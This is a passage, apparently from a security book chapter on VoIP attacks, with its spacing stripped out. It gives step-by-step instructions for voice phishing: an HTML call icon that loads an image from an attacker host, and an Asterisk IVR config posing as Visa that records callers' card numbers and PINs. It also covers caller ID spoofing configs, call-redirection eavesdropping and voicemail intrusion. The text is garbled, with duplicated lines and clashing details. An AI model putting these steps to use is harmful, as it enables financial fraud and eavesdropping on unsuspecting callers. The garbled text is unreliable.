1. LoadtheAsteriskPBX.a. DownloadtheAsteriskPBXvirtualmachine(VoIPonCD-

appliance)fromhttp://www.voiponcd.com/downloads.php/.

b. DownloadVMwarePlayerfromhttp://www.vmware.com/products/free_virtualization.html/

c. UnzipVoIP-appliance.zipontoyourharddrive.d. UsingVMwarePlayer,loadVoIPonCD.

2. Backupiax.conf,sip.conf,andextensions.confontheAsteriskPBXsystemwiththefollowingcommands:

$cp/etc/asterisk/extensions.conf/etc/asterisk/extensions.original.conf$cp/etc/asterisk/sip.conf/etc/asterisk/sip.original.conf$cp/etc/asterisk/iax.conf/etc/asterisk/iax.original.conf

3. ConfiguretheAsteriskPBXsystem.a. Downloadiax.conf,sip.conf,andextensions.conffrom

http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/b. Copyallthreefilesto/etc/asterisk,overwritingthe

originals.4. RestarttheAsteriskPBXsystemwith/etc/init.d/asterisk

restart.5. DownloadtheSIPclientX-Litefrom

http://www.xten.com/index.php?menu=download/andtheIAXclientiaxCommfromhttp://iaxclient.sourceforge.net/iaxcomm/.Done!Younowhavealabsettingforthischapter.

VoIPPhishingPhishingisnothingnewtomostcomputerusers,asmessagesforViagra,stocktips,orjustanotefromtheirfavoritefriendinNigeriaisreceivedalmosteveryday.Furthermore,anyonewhoownsafaxmachinecanalsofallvictimtoaformofphishing.Whohasn'treceivedunsolicitedadvertisementsbyfax(althoughthiswasmadeillegalbytheJunkFaxPreventionActof2005)?Becauseofthesuccessofphishersandtheamountofmoneythey"earn"fordoingalmostnothing,phishingisbigbusiness,andit'sgettinglarger.Infact,emailphishingisjustanotherformofthejunkmailandadvertisementsreceivedinphysicalmailboxeseveryday.Foranyonewhoownsahome,receivingtwoorthreelettersadayfrommortgagecompaniesofferingan"unbelievable"interestrateisalmoststandard.VoIPphishingappliesanoldconcepttoanewtechnology.Inmostphishingemails,thetargetisaskedtoclickalink,anddoingsotakesthemtoaboguswebsitethatappearstobethelegitimateone.Forexample,theusercanbesenttoapagethatlookslikethePayPalsitebutisactuallyawebsitecontrolledbyanattacker.Theboguswebsitewillthenasktheuserforsometypeofinformation,suchasausername,password,orsomeotheruser-specificinformation.Onceattackerscapturethisinformation,theycanthencontroltheuser'saccountwithouttheuser'sknowledge.Theyarefreetotransfermoney,tradestocks,orevensellusers'socialsecurityinformation.

SpreadingtheMessage

VoIPphishing,alsoknownasvishing,takesthesameconceptasemailphishingbutreplacesthefakewebsitewithafakephonenumberorevenphonedestination.Forexample,emailphishingattacksmayaskyoutogotowww.visa.comtoconductbusinessconcerningyourVisacreditcard;however,whilethetextwillshowupaswww.visa.com,theactualdestinationmightbeamaliciouswebsitecontrolledbyanattacker:123.234.254.253/steal/money/from/people.html.InVoIPphishing,attackersprovidenotthelinktoamaliciouswebsitebutalegitimate-lookingphonenumber,suchasan800,888,or866numberoftheattackers'devising.Furthermore,toincreasetheappearanceofvaliditywithphonenumberbuy-inservices,attackerscanattempttobuya800/888/866numbernearthephonenumberblockofthebank/institutiontheywishtoimpersonate.Givenadirectionorrequesttocallan800,888,or866number,theendusermaybemorelikelytotrustitandmakethetelephonecall.SeeFigure7-1foranexample.Inadditiontolistingaphonenumber,attackerscanbemoresophisticatedandaddamaliciousVoIPcallicontotheemailmessage.Forexample,manyVoIPclients,suchasSkype,allowiconstobeplacedinemailmessagesorwebsitestoinitiateoutgoingVoIPcalls.Furthermore,theVoIPcalliconcancontainthelogoofthecompanytheattackerwishestoimpersonate.Oncetheuserclicksthelogo,hewillautomaticallycallthenumbercontrolledbytheattackerwhilebelievingthatheisreallycallingtheactualnumberofhiscreditcardcompany.SeeFigure7-2.

Figure7-1.VoIPphishingemail

NoticethatthemessageshowninFigure7-2containsarecognizableandseeminglytrustworthycompanylogo,suchasVisa's,aswellastextthatsays"CallFraudDetectionServicesimmediately."Auserwhoclicksthelogowillautomaticallycallanumberoftheattacker'schoice,which,obviously,isnotactuallyVisa's.TheexploitcanoccurwithanyVoIPclient;however,thisparticularexamplehasbeencustomizedforSkype.ThereasonanattackerwoulduseSkypeversusamorevulnerableVoIPclientisthesamereasonwhyemailphishersarefondofPayPal—therearemorethan7millionregisteredusers!

Figure7-2.VoIPphishingemailwithmaliciousVoIPcallicon

Among7millionregisteredSkypeusers,oneofthemisboundtoclickthattrustediconandmakethedangerouscall.TheHTMLcodeforthemaliciousVoIPiconinFigure7-2isshownhere:

<ahref="skype:+18881182006?call"><imgsrc="http://attackers.ip.address/visa.jpg"style="border:none;"/></a>

OncetheHTMLfilehasbeensaved,itcanbeinsertedasasignaturefileinthephisher'semailclient(inMicrosoftOutlook,thisisassimpleasselectingInsert►Signature►Usethisfileastemplate►Browse►VoIP.Phish.Visa.htm).Thephishercansendmillionsofemails,andeachofthemwillhavethemaliciousVoIPiconviathesignaturefile.Inthesamplecode,noticethatthefirstiteminboldistheattacker's888number.Becauseenduserstypicallydon'tmemorizethephonenumbersoftheircreditcardcompany,itwouldbedifficultforanaveragepersontodetermineifitiscorrectornotwithoutcheckingthecarditself,whichmanypeoplewillfindtoobothersometodo(especiallyiftheuserisworriedaboutheraccountandwantstocallthenumberas

soonaspossible).TheseconditemshowninboldisthelocationoftheVisaicon,whichhasbeenhostedonaservercontrolledbytheattacker.Enduserswhoclickthelogowillbeenbetakentoaphone/voicemailboxcontrolledbytheattacker,asshowninFigure7-3.

Figure7-3.Resultofuser'sclickingVoIPcallicon

ReceivingtheCalls

Ineitherofthescenariosjustdescribed,listingaphonenumberorprovidingamaliciousVoIPcalllink,oncetheusermakesthecall,hewillmostlikelyenteravoicemailsystemthatsoundsexactlylikethesystemoftheintendedtarget(thebankorcreditcardinstitution).Aftertheuserispromptedtoenterhiscreditcardnumber,PIN,andmother'smaidennamefor"verification"purposesbytheautomatedsystemcontrolledbytheattacker,theattackerhassuccessfullycarriedoutaVoIPphishingattack.Theattackerneedstoensurethatwhentheuserarrivesatthebogusdestination,thevoiceanswersystem,suchastheIVR,

bogusdestination,thevoiceanswersystem,suchastheIVR,resemblesverycloselytherealdestination'svoiceanswersystem.Forexample,everyphishsiteforVisa,MasterCard,PayPal,BankofAmerica,CharlesSchwab,Fidelity,oranyotherfinancialinstitutioncloselymirrorstherealwebsite.IfauserwenttoaPayPalsiteandsawsomethingremotelydifferent,suchasadifferentloginpage,misspelling,orjustadifferentsequenceofeventstoaccessherinformation,shemightbetippedoffthatthesiteisbogus.Similarly,VoIPphishersmustensurethatthesequenceofevents,toneofvoice,andpromptsbytheautomatedvoicemessageservicecloselymirrorthoseofthelegitimateone.Thebadnewsaboutthistaskitthatitisfairlyeasytoaccomplish.TheAsteriskPBXisabletoprovideIVRservicesforusers,andattackerscanusethisfeaturetocreatetheirownIVRsystem,ensurethatitmirrorsthe"real"automatedenvironment,anduseittoanswercalls.Asteriskisalsoabletoauto-answeraphonenumberandprovideanautomatedcomputer-generatedvoiceinavarietyofdifferenttones.Furthermore,whenusersarepromptedtoentertheircreditcardnumber,PIN,orZIPcode,theattackercansetupanautomatedmethodtorecordthisinformationwiththeAsteriskPBX,makingtheattackverysimpleandsustainableacrossanumberoftargets.NowthatwehaveshownhowtocreateaVoIPphishingemaileasily,let'sshowhowtheautomatedcallsystemcanbesetup.Inthisexample,wewillphishusers,posingasacreditcardcompany.Justasrealcreditcardcompaniesdo,wewillasktheusertoenterhiscreditcardinformationforverificationpurposes,includingthecreditcardnumberandtheuser'sZIPcodeandfour-digitPIN.Unlikerealcreditcardcompanies,though,afterattackershavegainedtheinformationtheywant,thecallwilldisconnect,aneventthatwillbeblamedonhighcallvolume.Completethefollowingexercisetosetupamini–IVR-likesystemontheinternalphoneextension867.4474(To-Phish)usingAsteriskPBX.TheexampleherewillsimplyshowhowAsteriskcanbeusedtoautomaticallyanswerphonecalls;use

Swift,atext-to-speechprogramforAsterisk,tospeaktotheuser;asktheuserforinformationsuchasacreditcardnumber;andrecordthatinformationandsaveitasafile.

1. LogintotheAsteriskserver.2. DownloadSwiftfrom

http://www.mezzo.net/asterisk/app_swift.html/andinstallitwiththefollowingcommands:

tar-xzrapp_swif-release.tgz

makeinstall

loadapp_swift.so

3. OnceSwifthasbeeninstalledcorrectly,addthefollowingtexttoextension.conf(underthe[test]realm):

[test]exten=>8674474,1,Answerexten=>8674474,2,Wait(2)exten=>8674474,3,Monitor(wav,CreditCardPhish)exten=>8674474,4,Swift(WelcometoVisaCreditCardServices)exten=>8674474,5,Swift(Pleaseenteryour16digitcreditcardnumber)exten=>8674474,6,Swift(Pleaseenteryourzipcode)exten=>8674474,7,Swift(Pleaseenteryour3-digitpincode)exten=>8674474,8,Swift(I'msorry.Duetohighcallvolume,thesystemcannotprocessyourrequest.Pleasecallagainnever)exten=>8674474,9,Swift(goodbye)exten=>8674474,10,Hangup

4. Next,usinganyphoneregisteredtotheAsteriskserver,call867.4474,aslistedintheextensions.conffile.

5. Whenthesystemanswers,typeyourcreditcardnumber,ZIPcode,andthree-digitPIN.

6. Oncetheinformationhasbeenentered,Asteriskwillrecordtheinformationintwofileslocatedin/var/spool/asterisk/monitor:CreditCardPhish-in.wavfortheinputsoundsandCreditCardPhish-out.wavfortheoutputsounds.Therecordingprocessiscontrolledbyline3,wheretheMonitoroptionisusedtorecordthecall.Allsoundsandkeytonesenteredduringthecallwillberecorded.

7. Onceusershavecompletedtheircalls,logintotheAsteriskserverandcopyalltherecordingstoaWindowsoperatingsystem.

8. Convertthekeytonesrecordedinthe.wavfilestoactualtext,numbers,orsymbols.a. OntheWindowsoperatingsystem,downloadDTMF

fromhttp://www.polar-electric.com/DTMF/Index.html/.DTMFisatoolthattakestelephoneaudiokeytonesanddisplaysthemasthetext,numbers,orsymbolstheyrepresent.

b. OpenDTMFandplaythe.wavfilerecordings(CreditCardPhish-in.wavandCreditCardPhish-out.wav).

c. OncetheaudiohasbeenplayedandheardbyDTMF,itwilldisplaythetext,asshowninFigure7-4.

Figure7-4.DTMFconvertstelephonekeytonestotext.

Done!AftersendingtheVoIPphishingemail,theattackerhasrecordedtheinformationenteredbythevictim.

MakingFreeCallsMakingfreecallsfromaPCtoanylandlineormobilephoneintheUnitedStatesortheUnitedKingdomisnotreallyasecurityattack,butitisanicelittleperkthatwillenableseveralotherattacksinthischapter.Forafewyears,themajorVoIPsoftphoneshaveprovidedfreePC-to-PCcallingbutchargeforcallsfromPCstolandlinesandmobilephones,suchasSkypeOut.UsingAsteriskPBX,theX-Litesoftclient,andVoIPBuster,freecallsfromaPCtoalandlinephonearenowpossible(butonlyforUSorUKphonenumbers).Here'showyousetitup:

1. CreateaVOIPaccountwithVoIPBuster(http://www.voipbuster.com/),downloadtheVoIPBusterclient,andcreateausernameandpasswordthatwillbeusedinSIPsessionsetup.

2. OnceanaccountwithVoIPBusterhasbeensetup,logintotheAsteriskserverandchangedirectoriestotheAsteriskfolderwithcd/etc/asterisk.

3. Openthesip.conffilein/etc/asteriskandaddthefollowingitemsattheendofthefile.MakesureyoureplacetheitemsinboldwithyourVoIPBusterusernameandpassword.

[voipbuster]type=peerhost=sip.voipbuster.comcontext=testusername=USERNAMEsecret=PASSWORD

4. Opentheextensions.conffilein/etc/asteriskandaddthefollowingitemsinthetestrealm([test]).MakesureyoureplacetheitemsinitalicwiththenumberyouwanttocallviayourSIPclient.Ourexamplewillbecallingthenumber415.118.2006.

[test]exten=>100,Dial,(SIP/Sonia)

exten=>101,Dial,(SIP/Raina)exten=>14151182006,Dial,(SIP/14151182006@voipbuster)

5. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.IfusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandenteryourVoIPBuster

username,VoIPBusterpassword,anddomain(IPaddressoftheAsteriskserver).

6. SelectOKandClose.

Done!Bydialing14151182006ontheX-LiteVoIPsoftphoneonyourPC,youwillmakeacallfromtheAsteriskPBXonyourlocalnetworktoVoIPBuster,whichwillthenroutethecalltothelandlineormobilephoneyouhavechosen.Also,thisallowstheuseofAsteriskforinternalPC-to-PCcallsaswell,suchasextensions100and101inextensions.conf,whicharelocalVoIPclientontheinternalnetwork.ItshouldbenotedthatneitherAsterisknorX-LitemustbeusedwithVoIPBuster,becauseitalsohasathickclientthatcanmakefreephonecallsforyou;however,ifyouhaveanAsteriskPBXsystemforyourinternalcalling,itisnicethatyoucanusethesamePBXforbothinternalVoIPcallsaswellasexternalcalls.InordertouseVoIPBusterdirectlyforexternalcalls,simplydownloaditsclientanduseitsclientinterface.

CallerIDSpoofingCallerIDspoofingdoesexactlywhatitsnameimplies:Itchangestheappearanceofthesourcephonenumberofatelephonecall.CallerIDspoofingcanbeinnocentenough,allowingthekidswhogrewupwith*69tofinallymakephonecallsandnotfeelbadaboutgettingscaredandhangingupatthelastsecond;however,itcanhavemanymaliciousapplicationsaswell.Forexample,thephonenumberofyourbankcanbespoofed,leadingtoanotherformofphishingattacks.Spoofingabanknumbercouldallowattackerstocallthephonenumberofeveryoneinthephonebookandimpersonateatrustedfinancialinstitution.CallerIDspoofingcanalsoforcesomeonetoansweracallfromsomeoneheorshehasbeentryingtoavoid.ThereasonCallerIDspoofingispossibleisthatimplicittrustisplacedonthesourceentity(thecaller)duringaphonecall.Forexample,whenaphonecallismade,thesourcedevice,suchasaVoIPsoftphone,willsenditssourcephonenumbertothedestinationaspartofthedatapacket.SimilartohowsourceIPaddressescanbechangedinTCP/IPheaders,thesourcephonenumbercanbechangedbytheoutgoingdeviceinaTCP/IPVoIPpacket.Intraditionalphones,suchaslandlinesormobiledevices,nouserinterface/optionallowsforthisability(forgoodreason);however,inthecomputerworld,thisisassimpleasmakingafeweditstoyoursoftphone/VoIPpacketandplacingthecall.SpoofingvaluesinTCP/IPpacketsisnothingnewandissimplycarriedovertoVoIPdatapackets.TherearemanywaystospoofCallerID,includingspecializedcallingcards,onlinecallingservices,orsimplydownloadingspecificsoftware.AquickInternetsearchwillleadtomanymethodsforspoofingCallerID;wearegoingtoshowfourspecificexamples.Thefirstexample,whichisthesimplest(fivequicksteps),usesIAXwithanIAXclientandVoIPJet(anIAXVoIPprovider).ForthosewhopreferSIPclients,thesecond

exampleusesaSIPclient,suchasX-Lite,anAsteriskserver,andVoIPJet.Thethirdexampleusesanonlineservice.Finally,thefourthexampleshowshowtoperformCallerIDspoofingonaninternalVoIPnetwork,suchasaCiscoorAvayahardphonewithAsterisk.ItshouldbenotedthatspoofingyourCallerIDisnowdefinedaspre-texting,whichisagainstthelawandcarriesseverepenalties(asnotedbythe2006Hewlett-Packardcase).

Example1

Asnotedpreviously,thereasonCallerIDspoofingworkswithiaxCommandVoIPJetisthattheinformationprovidedbythecallingentityistrusted.iaxCommofferstheabilitytochangeone'sCallerIDnumber,asnotedinstep2inthenextexercise.BecauseVoIPJetisaVoIPprovider,itistakinginformationfromasoftphoneandconvertingthatinformationtoaPBXsystemforlandlinedestinations.Becausethesoftphone(iaxComm)isnotconnectingdirectlytoaPBXsystem,VoIPJethasnochoicebutsimplytotrusttheinformationitreceivesintheTCP/IPVoIPpackets.Inthiscase,iaxCommismodifyingtheinformationbeforeitissentoverthenetwork,forcingVoIPJetandthefinaldestinationtodisplaythespoofednumber.Forthisspoofingexample,wewillneedtosetupaVoIPJetaccounttospoofourCallerIDandanIAXclient,suchasiaxComm.

1. DownloadiaxCommfromhttp://iaxclient.sourceforge.net/iaxcomm/.

2. CreateaVoIPJetaccountbyvisitinghttp://www.voipjet.com/.Theaccountgrantsyou25cents'worthofcallsforfree.

3. OnceaVoIPJetaccounthasbeensetup,youwillseeanoptioncalledClickheretoviewinstructionsonsettingupAsterisktosendcallstoVoIPJet.Selectthatoptionandnotetheinformationtobeused,asshowninFigure7-5.

Figure7-5.VoIPJetaccountinformation

4. OpeniaxCommandwiththefollowingstepsconfigureittouseVoIPJet:a. SelectOptionsfromthemenubar.b. SelectPreferencesandthentheCallerIDtab.c. OntheNumberline,entertheCallerIDnumberyou

wishtospooffrom.SeeFigure7-6.Forthisexample,wewilluse4151182006.

Figure7-6.CallerIDtabiniaxComm

d. SelectApply►Save►Done.(ExitthemenubyclickingtheXintheupperrightcorner.)

e. SelectOptionsfromthemenubar.f. SelectAccounts.g. SelectAdd.h. EntertheVoIPinformationreceivedfromVoIPJetin

Figure7-5:AccountName(VoIPJet),Host(test.voipjet.com),Username(15193),Password(7f5db6951fabfaa4).

i. SelectSave,exitthemenu,andthenselectDone.

Done!YouhavenowregisteredyouriaxCommclienttoVoIPJet.Thenextstepistodialanyten-digitphonenumber,beginningwiththenumber1(e.g.,14158675309).TypethenumberintheExtensiontextboxoniaxComm.Oncethecalltakesplace,theCallerIDnumbersetinthePreferencessectionoftheclientwillappearontheremotephone.

Example2

InordertospoofCallerIDusingaSIPclient,youmustuseanAsteriskPBXsystemwiththeVoIPJetaccount.CompletethefollowingstepstospoofCallerIDbyconnectingtheX-LiteSIPclienttoanAsteriskserverandconnectingtheAsteriskservertoVoIPJet.

1. CreateaVoIPJetaccountbyvisitinghttp://www.voipjet.com/.Theaccountgrantsyou25cents'worthofcallsforfree.

2. OnceanaccountwithVoIPJethasbeensetup,youwillseeanoptioncalledClickheretoviewinstructionsonsettingupAsterisktosendcallstoVoipJet.Selectthatoptionandnotetheinformationtobeusedintheiax.confandextensions.conffiles,asshownpreviouslyinFigure7-5.

3. ChangedirectoriestotheAsteriskfolderwiththecommandcd/etc/asterisk.

4. CopytheIAXinformationgiventoyoubyVoIPJetdirectlyintotheiax.conffile.NoticethattheinformationfromVoIPJet,showninFigure7-5,mirrorstheitemsaddedtotheiax.conffile.Also,youwillprobablyhavetologoutandthenlogbackintogettheMD5checksumneededonthesecret=line.Hereisanexampleoftheinformationenteredintoiax.conf:

[voipjet]type=peerhost=test.voipjet.comusername=15193secret=7f5db6951fabfaa4auth=md5context=default

5. CopytheextensioninformationgiventoyoubyVoIPJetdirectlyintotheextensions.conffileunderthetestrealm([test]).Unlikeiax.conf,youdon'tneedeverythinggiventoyoubyVoIPJettocompletetheproofofconceptinthisexample,justthelinesshownbelow.Additionally,makesureyoureplacetheitemsinboldwiththephonenumberyouwishtospooffrom.Forthisexample,wewillbespoofingfrom415.118.2006toany10-digitnumberthatisdialedwithaprefixof1(asshownbythe_1NXXNXXXXXXline):

exten=>_1NXXNXXXXXX,1,SetCallerID(4151182006)exten=>_1NXXNXXXXXX,2,Dial,IAX2/15193@voipjet/${EXTEN}exten=>_011.,1,SetCallerID(4151182006)

exten=>_011.,2,Dial,IAX2/15193@voipjet/${EXTEN}

6. UsingaSIPclient,suchasX-Lite,betweenyourclientandtheAsteriskserverrequiresanextrastep.Openthesip.conffileandenterthefollowinginformation,whichwillspecifyaSIPclienttoregisterwithyourAsteriskserver:

[Sonia]type=friendhost=dynamicusername=Soniasecret=123voiptestcontext=default

7. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.IfusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandentertheUsername(Sonia),

Password(123voiptest),andDomain(IPaddressoftheAsteriskserver).

d. SelectOKandClose.

Done!YouhavenowregisteredyourAsteriskservertoVoIPJet(usingIAX)andyourX-LiteclienttotheAsteriskserver(usingSIP).Thenextstepistodialany10-digitphonenumber,beginningwiththenumber1(e.g.,14158675309),ontheX-LiteSIPclient.TheCallerIDinformationwillberetrievedfromextensions.conf(iteminboldinthestep5)ontheAsteriskserver.Oncethecalltakesplace,thenumberaftertheSetCallerIDlinewillappearontheremotephone.

Example3

ThenextmethodofspoofingyourCallerIDisquitesimple.Asstatedpreviously,therearemanymethodsofspoofingaCallerID,includingtheuseofservicesprovidedonwebsiteslike

http://www.fakecaller.com/.Bythetimethisbookisreleased,thislinkmightnolongerwork,butthereareprobablytenmorejustlikeit.Regardless,whilefakecaller.comallowsyoutospoofCallerID,itallowsyouonlytoinserttexttorepeatbacktotheuser.Actualconversationscannottakeplaceusingthisservice;however,theproofofconceptisdemonstratedwellwiththewebsite.CompletethefollowingstepstospoofyourCallerIDwithfakecaller.com.Notethattheservicesendscallinformationtoathirdparty.

1. Visithttp://www.fakecaller.com/.2. TypethenumberyouwishtocallintheNumbertodialtext

box.3. Typethespoofednumber,suchas4158675309,inthe

NumbertodisplayonCallerIDtextbox.4. Typethename,suchasHackmeAmadeus,intheNameonCaller

IDtextbox.Notethatthismaynotbedisplayed.5. SelectthetypeofVoice,maleorfemaleandage,forthe

call.6. Selectthemessageyouwishtorepeatwhenthetarget

picksupthephone,suchas"I'mRickJames,bitch!"7. SelectMakethecall.

Done!Inafewseconds,thenumbershowninstep2willreceiveacall,appearingfromthenumberonstep3.Thetextshowninstep6willbespokentotheuser.

Example4

ThenextmethodofspoofingyourCallerIDtargetsaninternalnetworkusingVoIPwithSIP.Forexample,youmaywanttospoofyourCallerIDwithoutboundcallsnottolandlinesormobilephonesbutrathertoyourcubicle-matesittingrightnext

toyou.IftheenvironmentusesCiscoorAvayahardphonesthatareSIP-enabled,spoofingtheCallerIDonaninternalVoIPnetworkisalsopossible.CompletethefollowingstepstospoofyourCallerIDonyourinternalVoIPnetwork.Thetargetedphoneextensionis2222,therealphoneextensionis1111,andthespoofedphoneextensionis1108.AsteriskwillbeusedtomimicthesetupbetweenthehardphonesittingonyourdeskandtheCiscoCallManagerorAvayaCallServer.AsoftclientwillalsobeusedtoconnecttotheAsteriskservertoexecutethespoofing.

1. UnplugtheEthernetjackfromthehardphoneonyourdesk.

2. OnyourAsteriskserver,openthesip.conffileandentertheusernameandpasswordinformationforyourrealphoneextension.ThiswillenabletheAsteriskservertoregistertoCiscoCallManagerorAvayaCallServer,insteadoftothehardphoneonyourdesk.Notethatthespoofer'srealphoneextension,passcode,andthespoofednumberallneedtobeenteredcorrectly,asshownintheboldtext.Forexample,iftheVoIPphoneonthedeskhastheextensionnumberof1111andthepasscodeis1111,thenthosevaluesmustenterinthisfile,aswellastheextensionyouwishtospooffrom(inthecalleridline):

[Spoof]type=friendhost=dynamicusername=1111secret=1111context=defaultcallerid=1108

3. OnyourAsteriskserver,openthesip.conffileandenterthefollowinginformation,whichwillenableaSIPclient(suchasX-Lite)toregisterwithyourAsteriskserver:

[Sonia]type=friendhost=dynamicusername=Sonia

username=Soniasecret=123voiptestcontext=default

4. Editextensionintheextensions.conffileandaddthefollowinginformationunderthetestrealm([test]).Noticethatwhenextension2222isdialed,theCallerIDvaluewillbesetto1108,asnotedinthefirstlinehere.

exten=>2222,1,SetCallerID(4151182006)exten=>2222,2,Dial,SIP/1112@Spoof/${EXTEN}

5. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.Ifyou'reusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandentertheUsername(Sonia),

Password(123voiptest),andDomain(IPaddressoftheAsteriskserver).

d. SelectOKandClose.

Done!YouhavenowregisteredyourAsteriskservertoCiscoCallManagerorAvayaCallServerandyourX-LiteclienttotheAsteriskserver(usingSIP).Thenextstepistodialthefour-digitphoneextensionof2222ontheX-LiteSIPclient.TheCallerIDinformationwillberetrievedfromextensions.conf(itemsinboldinsteps2and3)fromtheAsteriskserver.Oncethecallhasbeenplaced,thenumberaftertheCallerIDand/ortheSetCallerIDlinewillappearontheremotephone.Asyoucansee,CallerIDspoofingisquitesimple,nomatterwhichofthefourdemonstratedmethodsisused.TheabilitytospoofCallerIDhasmoreimpactthanapracticaljokeortosubvert*69,however.Forexample,creditcardcompaniesoftensendnewcreditcardsinthemailandrequireuserstousetheirhomephonenumbertoactivatethecard.Anangryneighbor,perhapsonewhohascleanedupaftertheneighbor'scatoristiredoflisteningtodogsbarkingallnight,canstealherneighbor'smailandactivateacreditcardbyspoofingthe

CallerIDsheiscallingfrom.Anotherattackinvolveslisteningtosomeoneelse'svoicemailfromhismobilephone.Inordertolistentovoicemailontheirmobilephones,mostusersselectthephone'svoicemailicon.Thisactionactuallycallstheirownnumber,whichputsthemintothevoicemailsystem.Often,usersdonotuseapasswordontheiraccount,thinkingthatthevoicemailboxcanbeaccessedonlybysomeoneholdingthephysicalphone.Iftheuserhasmadethismistake,anattackercanspooftheuser'sCallerID,callthemobilephone,andgetdirectaccesstothetarget'svoicemailsystemwithoutbeingpromptedforapassword.

AnonymousEavesdroppingandCallRedirectionMan-in-the-middleattackshaveplaguednetworksformanyyears.ToolsfromDsniff/fragroutertoCain&Abelhelpshowhownetworkcommunicationmethodsarenotsecure.Usingthesamemodel,telephonecommunicationviaVoIPcanfallintothesameproblemspace.WhileLayer2man-in-the-middleattacksusingARPpacketsarebyfartheeasiestwaytoeavesdroponacall,accesstothecorrectnetworkspaceisrequired.Unfortunately,thereareafewwaystoeavesdropwithoutusingARPpoisoning—usingcommonphishingattacksincombinationwithcallredirection.Thefirstkindofthisattackisatargetedattack,involvingCallerIDspoofing.Theattackeressentiallycreatesathree-waycallbetweenthecreditcardcompanyandthetarget,stayingonthelineasapassivelistenerandrecordingthecontent.TheattackerspoofshisCallerIDnumberastheonelistedonthebackofacreditcardoronthecreditcardcompany'swebsite.Oncethenumberhasbeenspoofed,theattackercallsthetargetononeconnection.Thetarget,believingthatthecalliscomingfromthecreditcardcompany,answersthecallthinkingitisatrustedentity.Oncethetargetanswersthecall,theattackercansendanautomatedcomputervoiceinforminghimofsupposedunusualactivityonhisaccountandaskinghimtoverifyhisinformation.Whilethemessageisplayingtothetargetononeconnection,theattackeropensanotherconnectionwiththerealcreditcardcompany.Oncethecreditcardcompanyanswersthecall,theattackercanthenconnect(three-waycallorconference)boththetargetandcreditcardcompanywhileremainingontheline.Beforedoinganythingelse,mostcreditcardcompaniesuseanautomatedcomputervoicetoverifycreditcardnumbers.Oncetheconferencehasbeenenabled,thetargetisthenaskedbytherealcreditcardcompanytoverifyhisinformationbytypingorspeakinghiscreditcardnumber,PIN,andthecard'sexpirationdate.Theattackersecretlyremainsonthecallandrecordsallthe

information.CompletethefollowingstepstoperformthisattackusingX-Lite.

1. Insteadofrepeatingsteps,completesteps1thru8from"Example2"onExample2;however,instep5,replace4151182006withthenumberonthebackofyourcreditcard.

2. OpenX-LiteandselecttheACbutton,whichshouldthenturnyellowandshowtextthatstatesAuto-conferenceenabled.ThisbuttonwillautomaticallycreateaconferencebetweenthetwolinesusedbyX-Lite.

3. Usingline1onX-Lite,callthetarget.ThiswillbeusingtheCallerIDvaluefromstep5intheearliersection.Whenthetargetanswersthephone,playapre-recordedaudiofilethatstates,"Thisisanautomatedmessage.Wehavenoticedunusualactivityinyouraccount.Pleaseremainonthelinetoverifyyourinformation."Apoorman'sapproachtorecordingthemessageistouseWindowsNarrator,whichisdescribedindetailinthenextsectionofthischapter.

4. Usingline2onX-Lite,callthecreditcardcompany.Oncethecreditcardcompanypicksupthecall,X-Liteimmediatelyconferencesallthelinestogether(theAuto-Conferenceoptionwasenabledinstep2).Thetargetwillthenbelisteningtotherealcreditcardcompanyandbepromptedforverificationinformation.

5. OnX-Lite,clicktheRecordbutton.Allinformationfromthetargettothecreditcardcompanywillnowberecordedbytheattackerandcanbeusedtocompromisethetarget'saccount.

Thesecondmethodofperformingthisattacktakesnotatargetedapproachbutawiderapproachforitstarget.ThisattackwasfirstmentionedbyJayShulmanatBlackHat2006.

Theattackersendsaphishingemailsimilartotheoneshownpreviouslyinthischapter.Whenanendusercallsthenumbershowninthephishingemail,theattackeropensasecondconnectiontotheactualcreditcardcompany.Insteadofansweringthecalldirectly,theattackerconnectstheenduserwiththerealcreditcardcompany;however,theattackerremainsontheline.Whentheuserisaskedbythecreditcardcompanytoverifyherinformationbyenteringorspeakinghercreditcardnumber,PIN,andthecard'sexpirationdate,theattacker,havingremainedonthecall,capturestheinformation.

SpamOverInternetTelephonyRemembertheolddayswhenyoucouldjustselectanddeleteallthespammessagesinyourinbox?HowaboutwhenyoucouldjustgotoyourJunkemailfolderandsimplydeleteitscontentswithjustoneclick?Nowthinkofhavingmorethanahundredvoicemailmessages(orthemaximumcapacityofyourvoicemailbox)onyourmobilephone.Couldyoudeleteallofthemwithjustafewclicksonyourphone?Furthermore,whatwouldyoudowhenlegitimateuserswhoaretryingtoleaveyouamessagearenotabletoleaveyouone,suchas"MyflightfromO'Haregotcanceledbecausesomeonesawacloud400milesawayfromtheairport,sopickmeupfromSJCat9PMinsteadofSFOat5PM"?Howdisruptivewouldtheseissuesbetoyourlifecomparedwiththe300emailmessagesfromtheCrownPrinceofNigeria?TheideaofSPITisnothingnew,astelemarketersalreadyuseautomatedtechnologytocallhomeuserstosellproductsandgoods.Furthermore,manyorganizationswillprovidethisserviceforasmallcharge,suchashttp://www.call-em-all.com/,whichallowsaspammertosendmorethan1,000peopleapre-recordedvoicemailforunder$100.However,withVoIP,notonlycanhundredsofpre-recordedmessagesbesentouttoanyphoneorvoicemailsysteminthecountry,thesemessagescanalsobefreeandhardtotrace,whichmakestheNationalDoNotCallRegistryalessermitigationstrategy.WhileeveryonelovestheirfavoriteRepublican,Democrat,orindependentpoliticalcandidatecallingthemonElectionDay,wouldtheyenjoyreceivingthosemessageseverydayfromananonymousseller?Inactuality,ananonymousspammermaybebetterthanwhatcouldbedonewiththetrueabuseofSPIT.Forfinancialgain,anattackercouldmimictheautomatedfrauddetectionservicethatcreditcardcompaniesoftenuse.Whenthecreditcardcompanydetectsanunusualcharge,anautomatedvoicecallexecutestothephonenumberlistedfortheaccountholder.

